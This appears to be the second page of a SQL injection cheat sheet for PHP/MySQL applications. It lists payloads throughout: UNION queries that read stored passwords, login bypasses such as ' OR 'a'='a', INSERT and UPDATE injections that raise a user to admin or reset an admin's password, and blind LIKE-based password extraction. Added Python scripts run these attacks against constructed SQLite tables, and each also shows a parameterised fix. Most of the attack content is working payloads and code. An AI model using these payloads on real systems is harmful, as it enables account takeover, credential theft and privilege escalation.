Advanced PHP injection methods collection (page 2/2)
Constructed statements:
select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,1,1 from user where userid=1) (the UNION must return the same number of columns as the left SELECT, here 6; a probe with the wrong count, e.g. 1,1,1,1,1,1,1, fails with "The used SELECT statements have a different number of columns", which is how the column count is found)
select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,username,password from user where userid=1)
union%20(select%201,0,2,'1999-01-01','a',password%20FROM%20user%20where%20userid%20=%205)%20order%20by%20eventdate
union%20(select%201,0,12695,'1999-01-01','a',password%20FROM%20user%20where%20userid=13465)%20order%20by%20eventdate
union%20(select%201,0,12695,'1999-01-01','a',userid%20FROM%20user%20where%20username ='sandflee')%20order%20by%20eventdate (looks up sandflee's userid)
(select a FROM table_name where a=10 AND B=1 ORDER BY a LIMIT 10)
select * FROM article where articleid='$id' union select * FROM……(when the other table has the same columns as the queried one, this can be submitted directly)
select * FROM article where articleid='$id' union select 1,1,1,1,1,1,1 FROM……(when the columns differ, pad the UNION with constants to match the count)
Special trick: in forms, search boxes and similar fields that end up in a LIKE clause, submit wildcard and quote-breaking strings such as:
"___"
".__ "
"%"
%' ORDER BY articleid/*
%' ORDER BY articleid#
__' ORDER BY articleid/*
__' ORDER BY articleid#
$command = "dir c:\\"; system($command);
select * FROM article where articleid='$id'
select * FROM article where articleid=$id
1' and 1=2 union select * from user where userid=1/* (submitted as $id in the quoted form, the statement becomes:)
(select * FROM article where articleid='1' and 1=2 union select * from user where userid=1/*')
1 and 1=2 union select * from user where userid=1 (the same attack against the unquoted form articleid=$id; no quote or trailing comment is needed)
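The union-based examples above (column-count probing, then the quoted and unquoted forms of articleid=$id) run end to end here as an added example; this is not code from the original page. It rebuilds the calendar_events and user tables in an in-memory SQLite database with constructed rows (column types and data are assumptions; the page only names the columns) and splices the value into the SQL text exactly as the PHP "$id" interpolation does. MySQL's "#" comment is not accepted by SQLite, so the payloads use the "/*" terminator, which both accept.

```python
import sqlite3

# Constructed in-memory copy of the page's calendar_events and user tables.
# Assumption: column types and rows are illustrative; the page only names the columns.
SCHEMA = """
CREATE TABLE calendar_events (
    eventid INTEGER PRIMARY KEY, allowsmilies INTEGER, public INTEGER,
    userid INTEGER, eventdate TEXT, event TEXT, subject TEXT);
INSERT INTO calendar_events VALUES (1, 1, 1, 7, '2004-03-01', 'meeting', 'Board meeting');
CREATE TABLE user (userid INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO user VALUES (1, 'admin', 'mypass');
INSERT INTO user VALUES (5, 'sandflee', 's3cret');
"""

COLS = "allowsmilies,public,userid,eventdate,event,subject"


def connect():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def vulnerable_quoted(con, eventid):
    # Same shape as  ... where articleid='$id' : the value is pasted inside quotes.
    sql = f"SELECT {COLS} FROM calendar_events WHERE eventid='{eventid}'"
    return con.execute(sql).fetchall()


def vulnerable_numeric(con, eventid):
    # Same shape as  ... where articleid=$id : no quotes, so nothing to break out of.
    sql = f"SELECT {COLS} FROM calendar_events WHERE eventid={eventid}"
    return con.execute(sql).fetchall()


def safe(con, eventid):
    # Parameterised: the value is bound, never spliced into the SQL text.
    sql = f"SELECT {COLS} FROM calendar_events WHERE eventid=?"
    return con.execute(sql, (eventid,)).fetchall()


def column_count_probe(con, n):
    # UNION with n constant columns. Returns the error text when n does not match
    # the left-hand SELECT and None when it does: this is how the attacker learns
    # how many columns the original query returns.
    try:
        vulnerable_numeric(con, "1 UNION SELECT " + ",".join(["1"] * n) + " FROM user")
    except sqlite3.OperationalError as e:
        return str(e)
    return None


# Payloads from the page; '/*' replaces MySQL's '#' so SQLite accepts them too.
NUMERIC_PAYLOAD = ("1 AND 1=2 UNION SELECT 1,0,2,'1999-01-01','a',password "
                   "FROM user WHERE userid=5")
QUOTED_PAYLOAD = ("1' AND 1=2 UNION SELECT 1,0,2,'1999-01-01','a',password "
                  "FROM user WHERE userid=5/*")


if __name__ == "__main__":
    con = connect()
    print(column_count_probe(con, 7))          # column-count error: 7 != 6
    print(column_count_probe(con, 6))          # None: the UNION is accepted
    print(vulnerable_numeric(con, NUMERIC_PAYLOAD))   # sandflee's password row
    print(vulnerable_quoted(con, QUOTED_PAYLOAD))     # same, via quote + comment
    print(safe(con, QUOTED_PAYLOAD))           # []: the payload is only a string
```

The "1 AND 1=2" prefix empties the left-hand result so the only row returned is the one the attacker chose; the constants 1,0,2,'1999-01-01','a' exist solely to satisfy the column count and types, and the sixth slot carries the data being read out.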
Statement forms. Create a database and insert a row:
create DATABASE `injection`
create TABLE `user` (
`userid` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL default '',
`password` varchar(20) NOT NULL default '',
PRIMARY KEY (`userid`)
) ;
insert INTO `user` VALUES (1, 'swap', 'mypass');
Inserting a registered user:
insert INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');
"insert INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email','1')";
insert INTO membres (login,password,nom,email,userlevel) VALUES ('','','','','3')#','1')
"insert INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'";
insert INTO membres SET login='',password='',nom='',userlevel='3',email=''
"insert INTO membres VALUES ('$id','$login','$pass','$nom','$email','1')";
update user SET password='$password', homepage='$homepage' where id='$id'
update user SET password='MD5(mypass)' where username='admin'#)', homepage='$homepage' where id='$id'
"update membres SET password='$pass',nom='$nom',email='$email' where id='$id'";
update membres SET password='[PASS]',nom='',userlevel='3',email=' ' where id='[ID]'
"update news SET Votes=Votes+1, score=score+$note where idnews='$id'";
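The INSERT and UPDATE cases above (registering with an injected userlevel, and retargeting a profile UPDATE at another account) as an added example that is not part of the original page. It uses a constructed membres table in in-memory SQLite; the column types, the meaning of userlevel (1 normal, 3 admin) and the sample rows are assumptions. SQLite has no MD5() and does not accept MySQL's "#" comment, so the payloads set a plain string and end with "/*".

```python
import sqlite3

# Constructed membres table after the page's register/update statements.
# Assumption: userlevel '1' is a normal member and '3' is an administrator.
SCHEMA = """
CREATE TABLE membres (
    id INTEGER PRIMARY KEY, login TEXT, password TEXT, nom TEXT, email TEXT, userlevel TEXT);
INSERT INTO membres VALUES (1, 'admin', 'adminpass', 'Admin', 'admin@example.org', '3');
"""


def connect():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def register_vulnerable(con, login, pw, nom, email):
    # Same shape as  insert INTO membres (login,password,nom,email,userlevel) VALUES ('$login',...,'1')
    sql = ("INSERT INTO membres (login,password,nom,email,userlevel) "
           f"VALUES ('{login}','{pw}','{nom}','{email}','1')")
    con.execute(sql)


def register_safe(con, login, pw, nom, email):
    con.execute("INSERT INTO membres (login,password,nom,email,userlevel) VALUES (?,?,?,?,'1')",
                (login, pw, nom, email))


def update_vulnerable(con, user_id, pw, nom, email):
    # Same shape as  update membres SET password='$pass',nom='$nom',email='$email' where id='$id'
    sql = (f"UPDATE membres SET password='{pw}',nom='{nom}',email='{email}' "
           f"WHERE id='{user_id}'")
    con.execute(sql)


def update_safe(con, user_id, pw, nom, email):
    con.execute("UPDATE membres SET password=?,nom=?,email=? WHERE id=?",
                (pw, nom, email, user_id))


def row(con, login):
    return con.execute("SELECT password,nom,email,userlevel FROM membres WHERE login=?",
                       (login,)).fetchone()


def uid(con, login):
    return con.execute("SELECT id FROM membres WHERE login=?", (login,)).fetchone()[0]


# Closes the VALUES list with userlevel '3' and comments out the server's ,'1').
ESCALATE_EMAIL = "m@x.org','3')/*"
# Closes the password literal, re-targets the WHERE at admin, comments out the rest.
TAKEOVER_PASSWORD = "pwned' WHERE login='admin'/*"


if __name__ == "__main__":
    con = connect()
    register_vulnerable(con, "mallory", "pw", "Mallory", ESCALATE_EMAIL)
    print(row(con, "mallory"))           # userlevel '3' although the code wrote '1'
    register_safe(con, "bob", "pw", "Bob", ESCALATE_EMAIL)
    print(row(con, "bob"))               # payload stored literally, userlevel '1'
    update_vulnerable(con, uid(con, "bob"), TAKEOVER_PASSWORD, "Bob", "bob@x.org")
    print(row(con, "admin"))             # admin's password is now 'pwned'
    update_safe(con, uid(con, "bob"), TAKEOVER_PASSWORD, "Bob", "bob@x.org")
    print(row(con, "bob"))               # only bob's own row changed, value literal
```

The two payloads target different positions: the email field is the last user-controlled value before the server-supplied userlevel, which is why it is the one used to close the VALUES list early; the password field is the first value in SET, so a WHERE planted there runs before the original WHERE is reached.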
Commonly used functions:
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
For example, given:
update article SET title=$title where id=1   the corresponding injected statements are:
update article SET title=DATABASE() where id=1
#writes the current database name into the title field
update article SET title=USER() where id=1
#writes the current MySQL user name (user@host as supplied by the client) into the title field
update article SET title=SYSTEM_USER() where id=1
#writes the current MySQL user name into the title field (SYSTEM_USER() is a synonym for USER())
update article SET title=SESSION_USER() where id=1
#writes the current MySQL user name into the title field (SESSION_USER() is a synonym for USER())
update article SET title=CURRENT_USER() where id=1
#writes the account name (user@host) that the server matched in the grant tables when authenticating this session into the title field
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
$req = "select * FROM membres where name like '%$search%' ORDER BY name";
select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name
select uid FROM admins where login='' OR 'a'='a' AND password='' OR 'a'='a' (the classic)
select uid FROM admins where login='' OR admin_level=1#' AND password=''
select * FROM table where msg like '%hop'
select uid FROM membres where login='Bob' AND password like 'a%'#' AND password=''
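The LIKE and login cases above (wildcard probing of a search field, the classic OR 'a'='a' bypass, admin_level=1 with a trailing comment, and the password like 'a%' trick extended to read a whole password one character at a time) as an added example, not code from the original page. It runs against constructed admins and membres tables in in-memory SQLite; table contents, the admin_level column and the password alphabet are assumptions, and "/*" stands in for MySQL's "#" comment.

```python
import sqlite3

# Constructed tables after the page's admins / membres queries (rows are made up).
SCHEMA = """
CREATE TABLE admins (uid INTEGER PRIMARY KEY, login TEXT, password TEXT, admin_level INTEGER);
INSERT INTO admins VALUES (1, 'root', 'h0rse', 1);
INSERT INTO admins VALUES (2, 'helpdesk', 'abc123', 0);
CREATE TABLE membres (uid INTEGER PRIMARY KEY, name TEXT);
INSERT INTO membres VALUES (1, 'Bob');
INSERT INTO membres VALUES (2, 'Alice');
"""


def connect():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def login_vulnerable(con, login, password):
    # Same shape as  select uid FROM admins where login='$login' AND password='$password'
    sql = f"SELECT uid FROM admins WHERE login='{login}' AND password='{password}'"
    return [r[0] for r in con.execute(sql)]


def login_safe(con, login, password):
    return [r[0] for r in con.execute(
        "SELECT uid FROM admins WHERE login=? AND password=?", (login, password))]


def search_vulnerable(con, search):
    # Same shape as  select * FROM membres where name like '%$search%' ORDER BY name
    sql = f"SELECT name FROM membres WHERE name LIKE '%{search}%' ORDER BY name"
    return [r[0] for r in con.execute(sql)]


def search_safe(con, search):
    # Bound parameter plus escaping of the LIKE metacharacters, so a user-supplied
    # '%' or '_' matches itself instead of acting as a wildcard.
    esc = search.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    return [r[0] for r in con.execute(
        "SELECT name FROM membres WHERE name LIKE ? ESCAPE '\\' ORDER BY name", (f"%{esc}%",))]


def extract_password_like(con, login, alphabet="abcdefghijklmnopqrstuvwxyz0123456789", max_len=32):
    # Blind read-out: '$login' AND password like 'prefix<c>%'/*  returns a row exactly
    # when the guess is a prefix of the real password. Assumes the password only
    # uses characters from `alphabet` (none of which is a LIKE wildcard).
    prefix = ""
    while len(prefix) < max_len:
        for ch in alphabet:
            if login_vulnerable(con, f"{login}' AND password LIKE '{prefix}{ch}%'/*", ""):
                prefix += ch
                break
        else:
            return prefix          # no character extends the prefix: password complete
    return prefix


if __name__ == "__main__":
    con = connect()
    print(login_vulnerable(con, "' OR 'a'='a", "' OR 'a'='a"))   # every admin uid
    print(login_vulnerable(con, "' OR admin_level=1/*", ""))     # only level-1 admins
    print(login_safe(con, "' OR 'a'='a", "' OR 'a'='a"))         # []
    print(search_vulnerable(con, "%' ORDER BY uid/*"))           # attacker controls ORDER BY
    print(search_vulnerable(con, "_"))                           # '_' matches every name
    print(search_safe(con, "_"))                                 # [] : literal underscore
    print(extract_password_like(con, "root"))                    # 'h0rse'
```

Note the operator precedence in the classic bypass: AND binds tighter than OR, so login='' OR 'a'='a' AND password='' OR 'a'='a' is true for every row regardless of the password, which is why it returns all uids rather than one.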